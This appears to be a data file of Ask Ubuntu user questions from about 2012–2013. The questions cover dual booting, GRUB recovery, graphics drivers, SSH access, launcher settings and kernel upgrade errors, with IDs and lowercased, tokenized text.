240436	how to create an image of my ubuntu 12.10	hi last week i installed ubuntu 12.10 on my laptop and today i have my system more or less configure as i like . i would like to know how can i create an image of the system that can use to install ubuntu in another computer as it currently have it in my laptop . i do n't want to re-install everything again just wan na boot from cd and get my ubuntu installed as it is in my laptop . what do you think is the best way to do that ?
240439	opensource document management	i 'm looking for web-based , opensource , php-mysql document managment for my organization with these features : features : full text searching document metadata user access previledges document history database backup upload document document upload with some document categorization by its type document categorization by company names ( it will be used by organization subsidaries ) it allows user to share document link automated user , file , and activity report well , it should be free too : ) we need it to run on php and mysql due to the current server setup . i 've checked some of demos such as ajaxplorer , owl , letodms , docmgr , maarch archiving dms , opendocman , and knowledgetree ( demo ) . i concluded that knowledgetree is the best choice that i found , but since they ended the community edition , it will be hard for us to manage the future problem . i tried to install it on ubuntu 12.04 lts and get stuck with several dependency of php 5.2 . the it departement will mantained it independently , so i try to find the best choice for them , both of the community support and the server requirement . is there any suggestion ? thanks !
240444	ubuntu 12.10 and lenovo x1 hdmi output	i 'm trying desperately to output hdmi from my laptop to my samsung 40eh6030 led tv . i connected the hdmi1 on the tv to the computer , it shows that it detects the tv ( 40 '' samsung electric.. ) in the `` displays '' section , on the tv i select that hdmi1 and i get `` no signal '' . it worked on the same computer while running windows 7 . any idea ? ? ?
240445	is n't open-source a two-edge sword ?	i know that ubuntu is an open source os , which is a great thing because all people can contribute . however , does n't this make it more vulnerable to hackers also , as they can alter the code in a malicious way more easily ? do the code or updates undergo some review before being released to the public ? thanks .
240450	how to declare that you have full superuser permissions when prompted on terminal ?	i am a very basic ubuntu user . everytime i am trying the terminal , i receive the following question and i do not know how to answer : do you have full superuser ( root ) permissions ? i want to configure the tv at home to send video via hdmi port . when i write `` get-edid '' , the question appears . y , yes or -y do not work . i am the root and know the password . i would like to learn how to say `` yes '' on ubuntu ? thank you in advance . miraรง
240455	ubuntu 12.10 with gnome 3 wm suspend graphical problem	so when i suspend my computer , the screen when my computer is locked or when i have opened the menu with windows button suddendly becomes bugged and looks like an old kinescope tv with no signal . is this somesort of a driver problem ? i am using a amd latest 64 bit linux proprietary driver . or is it gnome 3 problem for which i should just wait for a fix ?
240461	how to move icons in the unity launcher permanently , i.e . it survives a reboot	there are plenty of answered questions regarding this subject but how on earth can icons be moved permanently so that after the next boot they are where they were left ? some icons to programs i use a lot were installed the most recently , so consequently their unity launcher icons are at the bottom of the bar , neatly `` folded away . '' the machine is an old sempron-powered hp/compaq nx6325 so its grossly under spec 'd for 12.04lts with unity - which i like - but this makes it frustrating . i have found that newly installed programs ' icons are placed at the bottom , so yes , i can remove lesser used programs which are near the top of the launcher and then reinstall them but this seems a ridiculous way to have to organise it . i ca n't be the only one with more than 16 launchers in unity ! to rinzwind : ... the normal action after that is to drag it to another place . is that not working ! ? yes it works fine . but after a reboot the menu goes back to how it was before i dragged them to new locations . sorry if that 's not clear from my original post but i do n't know how to elaborate on it . see my response below to chaskes , maybe that will help . this is a permanent action . not on my machine it is n't . i used to be able to move the icons permanently but now i can only change their positions until i reboot . i could n't say for sure when the problem first presented . to chaskes : i know how to do all this stuff but , from my original post : ... how on earth can icons be moved permanently so that after the next boot they are where they were left ? i 'm trying to say that i have the following icons , in this order : dash home , chromium , firefox , thunderbird , blue fish , filezilla , picasa etc . i can move them wherever i want . but if i reboot they are back in the order shown above , as though this is a default order . it 's not alphabetical , as you can see . to blvdeer : yes , you understand what i want and you are getting near , i think . if i run the command you gave : gsettings get com.canonical.unity.launcher favorites i get this : [ 'chromium-browser.desktop ' , 'firefox.desktop ' , '/home/scooby2/.launcher/thunderbird.desktop ' , 'bluefish.desktop ' , 'filezilla.desktop ' , '/home/scooby2/.launcher/picasa 3.desktop ' , 'gimp.desktop ' , ... . ] ( the four dots represent the rest of the file , omitted for simplicity . ) it is slightly different in its content , i do n't know why . however i can then drag the icons to where i want them . if i run the same command again , the list shows the new order - which i can save to a file or script . however if i run gsettings set com.canonical.unity.launcher favorites '' [ '/usr/share/app-install/desktop/dvdstyler-data : dvdstyler.desktop ' , 'kde4-kdenlive.desktop ' , 'gimp.desktop ' , 'vlc.desktop ' , 'ssvnc.desktop ' , ... . ] '' ( the four dots represent the rest of the file , omitted for simplicity ) i get this : usage : gsettings [ -- schemadir schemadir ] set schema [ : path ] key value set the value of key to value arguments : schemadir a directory to search for additional schemas schema the name of the schema path the path , for relocatable schemas key the key within the schema value the value to set if this command would run i could put it in a script to run at start-up to rewrite the unity launcher order - problem not solved but a work around effected . looking at the man page for gsettings and googling for help makes me realise how complex this is and how little i know . does anybody have any ideas ?
240462	how do i handle grub rescue mode after installing burg ?	i installed burg on my computer , and after restarting , grub comes up with the following message : grub loading . error : no such device : 9b16030c-08f8-4f5d-b228-63e13bca7839 entering rescue mode ... grub rescue > typing the ls command will bring me this : ( hd0 ) this is probably wrong , ive seen people have many more listings when doing that command . when i type the command set , it comes up with : prefix= ( hd0 ) /boot/burg root=hd0 i have tried the commands : set prefix= ( hd0 , x ) /boot/grub set root= ( hd0 , x ) insmod normal normal i have tried pretty much every variation of that code , i do not get errors on the set prefix and the set root commands , but when i try any variation of the insmod command , then it comes up with either the error unknown partition or unknown filesystem variations tried of the insmod command insmod ( hd0 , x ) /boot/grub/normal.mod this comes up with the unknown partition error insmod normal this comes up with the unknown filesystem error the unknown partition error seems to appear when ( hd0 , x ) /boot is specified i have tried booting from a cd and it does n't seem to work . i am dual booted with windows 7 and ubuntu 12.04 how can i recover from this situation ? thanks
240475	acer revo rl80 graphics unsupported ?	i have just purchased an acer revo rl80 net top computer . i 've been trying to get ubuntu up and running on it with quite a bit of trouble . the only way i can get it to boot is through using the `` nomodeset '' parameter . unfortunately this results in very poor performance , especially in video playback . trying to boot without this set just gets me either a completely black screen that goes nowhere , or an endless cycle of bright flashing colours and static . is there any way of using ubuntu with the working intel hd drivers ? this is the computer : acer revo l80 nettop pc
240481	does my ubuntu 12.10 sends error reports ?	i have question does my ubuntu 12.10 sends error reports ? ? i often encounter this massage in ubuntu 12.10 beta after i would press continue it would open up launchpad webpage in the webbrowser and i had to fill some forms but now when i press continiue , system does not open launchpad web page anymore so is it something wrong with my system or did canonical changed the error handling ? ? thank you for your time
240488	installing ubuntu 12.1 on my laptop	i would like to install ubuntu on my laptop and completely erase all the previous work on it . i have downloaded ubuntu onto my usb and now i do n't know what to do . its a windows . should i just use the windows installer , would that erase all the previous data ?
240496	how to show grub after install ubuntu over windows 8 ?	i installed windows 8 and after that i installed ubuntu . this are my partition now : 70gb -- > windows 8 50gb -- > ubuntu 12.10 100mb -- > uefi 300mb -- > recovery i installed the grub on /dev/sda . then , after grub not showing up and booting directly into windows 8 , i turned the laptop off and booted again into ubuntu livecd and ran the boot-repair utility , it give me this information but it did n't solved the problem . my laptop still boots directly into windows 8 , without grub or ubuntu even showing up .
240497	partitioning sd-card	i want to partition sd-card to use the link2sd on android based mobile phone . i should make two partitions . first a fat partition for the user data second an ext4 for the applications how can i do this ?
240501	deleting ubuntu 12.10	i have ubuntu 12.10 with windows 7 installed on the same hard drive . ubuntu and windows are both installed on different partitions . i would like to remove ubuntu but i do n't know which partition it is installed on to remove it . is there a partition manager in ubuntu to tell me which one it is on . because i want to keep my windows 7 but remove ubuntu . thanks ,
240503	how to keep just xubuntu ?	i 've installed lubuntu-desktop and xubuntu-desktop on an ubuntu 12.10 installation . is there any way to remove the default gnome/unuty programs or at least the applications in the lubuntu-desktop meta-package , so i will have something like a xubuntu system ?
240504	problems with signature of archive ?	i have a ubuntu server vm running 12.10 and functioning as a minecraft server . i tried to run updates on it today and am getting an error the singature for quantal-backports does n't match . i get an invalid signature on that , the key is 4097eaf437d05b5 or at least that 's what the error shows . is there an easy way to resolve this ? thanks
240514	connection timeout for ssh server	i 'm trying to setup openssh-server , but i 'm having some issues connecting . i changed the port to something non-standard ( 57757 ) and then set my router to forward to that port . on my lan , i 'm able to ssh into my machine fine using port 57757 , but not able to do so on the wan . if i 'm outside the lan , and i try to access my machine by an incorrect port , i immediately get a `` connection refused '' message . however , with the correct port it just hangs and then timeouts . what can i try to debug the issue ? i tried a traceroute , but it did n't tell me anything useful . edit : i realized that my problem was that my router did n't support accessing it by wan ip internally . i ssh 'd out to a different server and back in and it worked fine .
240515	how to toggle wireless using a script	my laptop comes with the option to toggle wireless with the fn+f12 key , but unfortunately this key does n't work . now inspired by this question , i would like to write a script that can toggle the software state of the wireless , preferably without needing sudo .
240517	post-ubuntu 12.10 windows install on dual hard drives	i can see that there are other similar threads , but many relate to older versions of ubuntu or take a slightly different tact . the setup is thus : i have one computer with one sata drive in it . when the computer , which was windows , crashed some months ago i opted to switch to ubuntu rather than re-obtain windows ( i had lost the cd/key , it was a mess ) - even though at the time windows was better suited to my needs . i popped ubuntu on and everything has been going swell , love it , learning it and so far it has been meeting my needs . for a number of reasons ( which are n't particularly important ) i 've found myself thinking that i would like to have another boot option of windows for certain particular tasks but primarily use ubuntu . i have seen much on installing ubuntu on a partition from windows but fewer things on windows from ubuntu , especially if it is from a second harddrive and not a partition . i guess my overarching question is : is there any great difficulty in popping a second harddrive in , and installing windows on it ? i do n't know much about the mechanics of all this , but my thought turned to whether there would be 'competition ' of any sort between the drives for boot priority , or if there would be trouble even if i booted into ubuntu with the windows drive still 'running ' in the background and whether things like ram and video card compatibility would come into problem ? it seems like most people go the other way from windows to ubuntu -- would it be easier to just install windows then partition and then install ubuntu back onto a partition of the same harddrive and restore everything from a backup ? much thanks , steadily learning and loving it , m
240520	installing ubuntu onto my 13 year old pc	i have a windows xp dell , from like 2000 . i 'm trying to completely install ubuntu onto it , not run it from a cd , or usb . i want it to erase everything , now i tried the windows installer and it said i did n't have enough space . my computer wo n't let me delete anything else that is big , but still does n't have enough space . so i downloaded ubuntu 12.10 onto my usb and loaded the boot setup , however my down arrow key does n't work so i ca n't make it boot from my usb and ca n't use wubi because the computer thinks it needs the space . are there any shortcuts to replace the down arrow key ? or any other ways to install linux ?
240521	qt creator tutorial : itemstyle invalid	running the currencyconverter tutorial `` itemstyle '' in the following line is underlined with red : itemstyle.class : `` title '' with an error `` invalid property name '' how to fix this error ?
240527	is recovery mode supposed to hang after fsck ?	ubuntu 12.04.1 lts i wanted to test running fsck on root file system ( ext4 ) on my home pc before i try to fix a real problem on my work server . i booted into linux recovery mode , and selected : fsck - check all file systems this produced : fsck for util-linux 2.20.1 /dev/sdb5 : 276147/151969160 files ( 0.2 % non-contiguous ) , 2214857/60774919 blocks then hung with no disk activity lights flashing . i left it for 10 minutes but no change . enter or esc did nothing . eventally i did ctrl-c and it booted . i only have 1 file system in /etc/fstab ( other than proc & swap ) . is this supposed to happen ? i searched for other posts in askubuntu about recovery mode , and from what i can tell , it should continue somehow after doing the fsck ( s ) . i did find link which seems to have same behavior but in that case the system was unbootable . i also booted from 12.04.1 live dvd and selected 'test linux ' and manually ran sudo fsck /dev/sdb5 which ran for about the same time ( 10 seconds ) and also did n't find any errors . my system dual boots linux & windows 7 and windows c : is an ssd .
240532	nvidia driver problem on ubuntu 12.10	i just installed ubuntu from scratch.however plain installation does not include nvidia driver initself so i installed it from 'additional drivers ' tool but it crash the ubuntu and take the resolution and unity down . i looked at all the posts on internet and come up no working solution . i install nvidia-current than remove , install nvidia-current-update than remove . i tried all the possibilities that are proposed on internet . only working solution was removing all the nvidia related packages with apt-get remove nvidia* then installing nouveau by apt-get install xserver-xorg-video-nouveau . it takes all the things as usual but i guess without correct nvidia driver . am i installing wrong driver or what ? wha might be the problem ? my graphical card is geforce gt635m on ubuntu 12.10
240533	laptop keyboard stops working after x2x install and use	i 'm new to linux/ubuntu and i have encountered a little problem : after installing x2x ( following ubuntu community documentation about x2x ) my laptop keyboard no longer works . the x2x system worked great - i was able to control my laptop from the desktop which was ssh 'd into it ... but the keyboard on the laptop no longer works . i have a dual-boot , and when i boot into lion ( it 's an early 2008 macbook ) the keyboard works fine . also , if i use a wireless usb mouse/keyboard when in ubuntu they work ... just the actual computer hardware does n't . help ? summary : installed x2x , worked great now the keyboard on my laptop dose n't work when logged into ubuntu , but works in native os ( mac , lion ) edit : additionally , if i log into a guest account in ubuntu they keyboard works fine ... so i 'm assuming there 's something wrong just in my main account .
240534	no boot option after ubuntu 12.1 installation on another hard disk	i just installed ubuntu 12.10 on my windows xp sp3 gr desktop using ubuntu dvd from iso file . operatings systems are in diferent hard disks . after the install i did not get the option of choosing os and directly went to windows xp . i think it has something to do with grub , but i 'm not really sure . please help . thank 's
240538	allow creating directories from applications	i just started using ubuntu a week ago . i noticed that applications do n't have permissions to create directories . e.g . i ca n't create a new directory from my libreoffice writer save as dialog . can i do something to change that and is it wise to do so ?
240553	how do i install ra3290.bin wireless driver into /lib/firmware	i have a hp envy dv7 that has the rt3290 wireless card . a dude answered a question on installing the rt3290 wireless driver suggested upgrading the kernel to above 3.6.3 , he then also said to make sure that you have the rt3290.bin file in the /lib/firmware/ directory . how do you obtain this rt3290.bin file ? how do you upgrade the firmware ?
240555	how to prevent ecryptfs from umounting home if tmux is still running ?	i have a server , which i access over ssh . sometimes i like to run some scripts ( some of them in the background ) in tmux and then detach it , close the connection and access tmux later . but unfortunately ecryptfs ( or whatever service does that stuff ) umounts my home-folder as soon as the ssh-connection is closed . this leads to several errors , because the scripts/deamons want to access some files in my home-folder . so is there a way to prevent ecryptfs from umounting my home if there is still a ( detached ) tmux session running ? i know that i could just disable the encryption , but i would rather like to keep it and solve the problem someway else .
240558	how do i delete ubuntu entirely and then install windows 8 from an iso i have on an sd card ?	i would no longer like to have ubuntu on my laptop . i have recently placed an iso file for windows 8 on to an sd card ( formatted as fat ) . can someone give me the steps necessary to ehtirely getting rid of ubuntu and then installing/booting windows 8 from my sd card ?
240561	i need to change out my bios in my asus g75vw	i need to upgrade my bios to eliminate some issue i 'm haveing with my system . i 'm running ubuntu 12.04 on my asus g75vw ( no duel boot ) after a clean install . i have downloaded bios version 222 to replace the existing 210 that it is currently using . my question is how do i go about doing this ? i am very new to linux ( 3 days ) and could really use some help . thank you
240568	how to remove ubuntu without keyboard , mouse , and cd drive	is there anyway i can remove ubuntu without a keyboard nor mouse ( i can use my mouse and keyboard in windows ) , and no cd drive . i could delete the ubuntu partition in windows but if i do so how can i delete it while keeping the grub loader for booting ?
240572	how do i fix black screen issue on an ubuntu 12.10 amd64 installation ?	i 'm trying to get ubuntu 12.10 on my asus k95v laptop , but i have issues . i have installed a bootable usb stick to boot ubuntu . when i launched , it gave me these 4 options : i have tried the first two options , they both just give a black screen and do nothing . id like to know how to fix the black screen since i want a full install of ubuntu . thanks !
240574	windows 8 & ubuntu 12.10 dual boot issues	i had recently bought a dell inspiron 7520 laptop , which was pre-loaded with windows 8 . i wanted to set up dual boot with ubuntu 12.10 . i am having the following issues . any help will be really appreciated . 1 ) i was not able to start ubutu 12.10 live cd in uefi mode . i am not able to find any bios setting to do so . the bios firmware version , thats been loaded with the laptopn is a07 . 2 ) as a result , i have to install ubuntu in legacy mode , which naturally does not detect the windows 8 installation . after installing ubuntu , i tried using boot-repair to convert the legacy installation to uefi mode . but the boot-repair failed with the following error . http : //paste.ubuntu.com/1525014/ 3 ) i am not sure , how to go ahead from here . any help will be really appreciated .
240577	ubuntu 12.10 and windows 8 dual boot - bluetooth pairing	i have a dell l702x which has been enabled for uefi via custom bios and i have windows 8 pro x64 and ubuntu 12.10 x64 successfully dual booting on gpt . i have named my device under ubuntu with the same visible name under windows . all devices pair ok under each respective operating system but the pairs are unique and not shared between the two . i am struggling to find a way to copy in my bluetooth peripheral keys from windows 8 into ubuntu 12.10 . i can extract the keys from [ hkey_local_machine\system\currentcontrolset\services\bthport\parameters\keys ] from windows but i ca n't find the `` linkkeys '' file that is supposedly under /var/lib/blueooth/ [ deviceid ] / ? i am guessing the keys are now in a different place or a different method of access ( if at all possible ) ? any help would be greatly appreciated .
240583	is it possible to search in the gnome-terminal ?	is there something which can be used to search and highlight terms in terminal output ? i need to search for `` error '' after running make .
240590	i ca n't download anything after trying to install skype	i keep getting this error whenever i try to download something or open up software center : the package skype : i386 needs to be reinstalled , but i ca n't find an archive for it . i am a new to ubuntu and i do n't know how to fix it please help !
240591	install dropbox and set my www folder as the synced folder on the server	i want to sync my www folder with dropbox . how can i do that ? i am using ubuntu server 12.xx something . this for development purpose only . i goggled it but i was unsuccessful
240596	why fdisk disk size use 1000 not 1024 to calculate ?	i found that 429496729600 bytes change to 429.5 gb is calculated by 1000 . but units = sectors of 1 * 512 = 512 bytes . why 429.5 gb not calculated by 1024 ? and 255*63*52216=838850040 ! = 838860800 . what happened ? why they have little difference ? my fdisk info : sam @ sam : ~ $ sudo fdisk -l /dev/sda [ sudo ] password for sam : disk /dev/sda : 429.5 gb , 429496729600 bytes 255 heads , 63 sectors/track , 52216 cylinders , total 838860800 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000787ed device boot start end blocks id system /dev/sda1 * 2048 836763647 418380800 83 linux /dev/sda2 836765694 838858751 1046529 5 extended /dev/sda5 836765696 838858751 1046528 82 linux swap / solaris sam @ sam : ~ $ thank you~
240597	dual boot windows 8 and ubundu not see partitions	i 'm trying to install both operating systems on dual boot , but ubuntu does not see the hd with two partitions only full hd . in windows explorer have 2 partitions on ubuntu partitioner have only one
240600	connection to internet fails after restarting the modem	every time i restart my modem , i come across this problem : the modem is shown connected but no internet is available . ... this means that if i restart my modem , i should install a fresh copy of the ubuntu in order to get access to internet : ( my laptop has only ubuntu 12.04 as its os ; the modem is a adsl2+ dynalink rta1025we and the browser is mozilla firefox . is there anyone who knows how i can fix this ? thank you .
240607	can i install 12.10 on an external hd that will become an internal drive in another system without changing my windows 7 system ?	how can i install 12.10 on an external hard drive that i plan to put into another computer that will only run ubuntu ? i have this drive connected to my windows 7 and the reason i 'm asking is because i have tried to install from the dvd directly into this other computer without luck as the install errors out halfway through the install . the details on the error messages are all very cryptic so i wo n't bother to include them - i just need to know how to install on this now external drive that will soon be the primary drive for this other computer without hosing up my win 7 box as i do n't want that machine to become a dual booter . please help ! also i almost forgot - the hd i 'm installing on ( that i removed from the other computer is ide - could this be the problem ? thanks .
240610	how to transfer files between my nexus 7 and my pc using a usb cable ?	what is the correct method to transfer files between ubuntu running on my nexus 7 and ubuntu 12.04 running on my pc using a usb cable ? i am not asking about the bluetooth or wifi method for transferring files . i am specifically asking about how to transfer files using a usb cable to mount / auto-mount the connected nexus 7 . on a side note : i have tried the go-mtpfs method but it does not work when ubuntu is running on the nexus 7 .
240612	problem with dkms upgrading 12.04 to kernel 3.6.9	i am trying to upgrade my ubuntu 12.04 to linux kernel 3.6.9 as described here . this is what i get in console : andres @ andres-nt : /tmp $ sudo sh linux-kernel-3.6.9 # # # # # # # # # # # this bash script is created by upubuntu.com # # # # # # # # # # # # # # # # # # # # # # kernel 3.6.9 will be installed in an x86_64 system # # # # # # # # # # # press enter to continue , or abort by pressing ctrl+c -- 2013-01-13 01:12:10 -- http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.6.9-raring/linux-headers-3.6.9-030609_3.6.9-030609.201212031610_all.deb resolving kernel.ubuntu.com ( kernel.ubuntu.com ) ... 91.189.94.216 connecting to kernel.ubuntu.com ( kernel.ubuntu.com ) |91.189.94.216|:80 ... connected . http request sent , awaiting response ... 200 ok length : 12003176 ( 11m ) [ application/x-debian-package ] saving to : `linux-headers-3.6.9-030609_3.6.9-030609.201212031610_all.deb' 100 % [ ====================================== > ] 12.003.176 88,4k/s in 2m 20s 2013-01-13 01:14:31 ( 84,0 kb/s ) - `linux-headers-3.6.9-030609_3.6.9-030609.201212031610_all.deb ' saved [ 12003176/12003176 ] -- 2013-01-13 01:14:31 -- http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.6.9-raring/linux-headers-3.6.9-030609-generic_3.6.9-030609.201212031610_amd64.deb resolving kernel.ubuntu.com ( kernel.ubuntu.com ) ... 91.189.94.216 connecting to kernel.ubuntu.com ( kernel.ubuntu.com ) |91.189.94.216|:80 ... connected . http request sent , awaiting response ... 200 ok length : 951720 ( 929k ) [ application/x-debian-package ] saving to : `linux-headers-3.6.9-030609-generic_3.6.9-030609.201212031610_amd64.deb' 100 % [ ====================================== > ] 951.720 117k/s in 9,5s 2013-01-13 01:14:42 ( 97,6 kb/s ) - `linux-headers-3.6.9-030609-generic_3.6.9-030609.201212031610_amd64.deb ' saved [ 951720/951720 ] -- 2013-01-13 01:14:42 -- http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.6.9-raring/linux-image-3.6.9-030609-generic_3.6.9-030609.201212031610_amd64.deb resolving kernel.ubuntu.com ( kernel.ubuntu.com ) ... 91.189.94.216 connecting to kernel.ubuntu.com ( kernel.ubuntu.com ) |91.189.94.216|:80 ... connected . http request sent , awaiting response ... 200 ok length : 12418742 ( 12m ) [ application/x-debian-package ] saving to : `linux-image-3.6.9-030609-generic_3.6.9-030609.201212031610_amd64.deb' 100 % [ ====================================== > ] 12.418.742 130k/s in 1m 49s 2013-01-13 01:16:32 ( 112 kb/s ) - `linux-image-3.6.9-030609-generic_3.6.9-030609.201212031610_amd64.deb ' saved [ 12418742/12418742 ] -- 2013-01-13 01:16:32 -- http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.6.9-raring/linux-image-extra-3.6.9-030609-generic_3.6.9-030609.201212031610_amd64.deb resolving kernel.ubuntu.com ( kernel.ubuntu.com ) ... 91.189.94.216 connecting to kernel.ubuntu.com ( kernel.ubuntu.com ) |91.189.94.216|:80 ... connected . http request sent , awaiting response ... 200 ok length : 28401200 ( 27m ) [ application/x-debian-package ] saving to : `linux-image-extra-3.6.9-030609-generic_3.6.9-030609.201212031610_amd64.deb' 100 % [ ====================================== > ] 28.401.200 238k/s in 4m 51s 2013-01-13 01:21:24 ( 95,2 kb/s ) - `linux-image-extra-3.6.9-030609-generic_3.6.9-030609.201212031610_amd64.deb ' saved [ 28401200/28401200 ] selecting previously unselected package linux-headers-3.6.9-030609-generic . ( reading database ... 363604 files and directories currently installed . ) unpacking linux-headers-3.6.9-030609-generic ( from linux-headers-3.6.9-030609-generic_3.6.9-030609.201212031610_amd64.deb ) ... selecting previously unselected package linux-headers-3.6.9-030609 . unpacking linux-headers-3.6.9-030609 ( from linux-headers-3.6.9-030609_3.6.9-030609.201212031610_all.deb ) ... selecting previously unselected package linux-image-3.6.9-030609-generic . unpacking linux-image-3.6.9-030609-generic ( from linux-image-3.6.9-030609-generic_3.6.9-030609.201212031610_amd64.deb ) ... done . selecting previously unselected package linux-image-extra-3.6.9-030609-generic . unpacking linux-image-extra-3.6.9-030609-generic ( from linux-image-extra-3.6.9-030609-generic_3.6.9-030609.201212031610_amd64.deb ) ... setting up linux-headers-3.6.9-030609 ( 3.6.9-030609.201212031610 ) ... setting up linux-image-3.6.9-030609-generic ( 3.6.9-030609.201212031610 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 3.6.9-030609-generic /boot/vmlinuz-3.6.9-030609-generic error ( dkms apport ) : kernel package linux-headers-3.6.9-030609-generic is not supported error ! bad return status for module build on kernel : 3.6.9-030609-generic ( x86_64 ) consult /var/lib/dkms/fglrx/8.961/build/make.log for more information . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.6.9-030609-generic /boot/vmlinuz-3.6.9-030609-generic update-initramfs : generating /boot/initrd.img-3.6.9-030609-generic w : possible missing firmware /lib/firmware/rtl_nic/rtl8168g-1.fw for module r8169 w : possible missing firmware /lib/firmware/rtl_nic/rtl8106e-1.fw for module r8169 run-parts : executing /etc/kernel/postinst.d/pm-utils 3.6.9-030609-generic /boot/vmlinuz-3.6.9-030609-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.6.9-030609-generic /boot/vmlinuz-3.6.9-030609-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.6.9-030609-generic /boot/vmlinuz-3.6.9-030609-generic generating grub.cfg ... found linux image : /boot/vmlinuz-3.6.9-030609-generic found initrd image : /boot/initrd.img-3.6.9-030609-generic found linux image : /boot/vmlinuz-3.2.0-35-generic found initrd image : /boot/initrd.img-3.2.0-35-generic found linux image : /boot/vmlinuz-3.2.0-34-generic found initrd image : /boot/initrd.img-3.2.0-34-generic found linux image : /boot/vmlinuz-3.2.0-29-generic found initrd image : /boot/initrd.img-3.2.0-29-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda1 done setting up linux-image-extra-3.6.9-030609-generic ( 3.6.9-030609.201212031610 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 3.6.9-030609-generic /boot/vmlinuz-3.6.9-030609-generic error ( dkms apport ) : kernel package linux-headers-3.6.9-030609-generic is not supported error ! bad return status for module build on kernel : 3.6.9-030609-generic ( x86_64 ) consult /var/lib/dkms/fglrx/8.961/build/make.log for more information . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.6.9-030609-generic /boot/vmlinuz-3.6.9-030609-generic update-initramfs : generating /boot/initrd.img-3.6.9-030609-generic w : possible missing firmware /lib/firmware/rtl_nic/rtl8168g-1.fw for module r8169 w : possible missing firmware /lib/firmware/rtl_nic/rtl8106e-1.fw for module r8169 run-parts : executing /etc/kernel/postinst.d/pm-utils 3.6.9-030609-generic /boot/vmlinuz-3.6.9-030609-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.6.9-030609-generic /boot/vmlinuz-3.6.9-030609-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.6.9-030609-generic /boot/vmlinuz-3.6.9-030609-generic generating grub.cfg ... found linux image : /boot/vmlinuz-3.6.9-030609-generic found initrd image : /boot/initrd.img-3.6.9-030609-generic found linux image : /boot/vmlinuz-3.2.0-35-generic found initrd image : /boot/initrd.img-3.2.0-35-generic found linux image : /boot/vmlinuz-3.2.0-34-generic found initrd image : /boot/initrd.img-3.2.0-34-generic found linux image : /boot/vmlinuz-3.2.0-29-generic found initrd image : /boot/initrd.img-3.2.0-29-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda1 done setting up linux-headers-3.6.9-030609-generic ( 3.6.9-030609.201212031610 ) ... examining /etc/kernel/header_postinst.d . run-parts : executing /etc/kernel/header_postinst.d/dkms 3.6.9-030609-generic /boot/vmlinuz-3.6.9-030609-generic error ( dkms apport ) : kernel package linux-headers-3.6.9-030609-generic is not supported error ! bad return status for module build on kernel : 3.6.9-030609-generic ( x86_64 ) consult /var/lib/dkms/fglrx/8.961/build/make.log for more information . and here is /var/lib/dkms/fglrx/8.961/build/make.log : dkms make.log for fglrx-8.961 for kernel 3.6.9-030609-generic ( x86_64 ) dom ene 13 01:23:17 art 2013 amd kernel module generator version 2.1 doing makefile based build for kernel 2.6.x and higher rm -rf *.c *.h *.o *.ko *.a . ? ? * *.symvers make -c /lib/modules/3.6.9-030609-generic/build subdirs=/var/lib/dkms/fglrx/8.961/build/2.6.x modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.6.9-030609-generic' cc [ m ] /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.o /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c : in function ‘kcl_mem_alloclinearaddrinterval’ : /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c:2122:5 : error : implicit declaration of function ‘do_mmap’ [ -werror=implicit-function-declaration ] /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c:2122:13 : warning : cast to pointer from integer of different size [ -wint-to-pointer-cast ] /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c : in function ‘kasinitexecutionlevels’ : /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c:4157:5 : error : ‘cpu_possible_map’ undeclared ( first use in this function ) /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c:4157:5 : note : each undeclared identifier is reported only once for each function it appears in /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.c:4157:5 : warning : left-hand operand of comma expression has no effect [ -wunused-value ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /var/lib/dkms/fglrx/8.961/build/2.6.x/firegl_public.o ] error 1 make [ 1 ] : *** [ _module_/var/lib/dkms/fglrx/8.961/build/2.6.x ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.6.9-030609-generic' make : *** [ kmod_build ] error 2 build failed with return value 2 i have an hp g4-1387la with an core i5 with hybrid graphics card . any advice ? i am using catalyst driver as described here so i do n't know what is the problem with fglrx driver . thank you very much for your help .
240615	lubuntu 12.10 lightdm issues - powerpc	i have a powerpc g4 with two drives ( one running mac osx server ) that i would like to install ubuntu on , however i am attempting to boot from a livecd first , to check that everything works correctly . i am using a live cd for lubuntu 12.10 . when i boot from the cd , i can get to a startup screen that says `` lubuntu 12.10 '' and lists the current action , but this screen always hangs . right now , it says `` starting system v runlevel compatibility '' , however if i have the machine connected to a network , it says `` starting mount network filesystems '' . what is the nature of this issue ? where can i find better logs of the problem ? ( /var/log/boot.log does n't have much helpful info ) update : i am thinking this may actually be a graphics only issue , as i can get to a command line which looks fine , despite the frozen splash screen . update 2 : i downloaded the alternate install . i have this now installed on the machine , however it still exhibits the same behaviour . on boot , it freezes , however ctrl+opt+f1 gets me a fully functional command line . update 3 : i looked through more logs . in /var/log/lightdm/x-0.log i found : fatal server error : no screens found is this driver-related ?
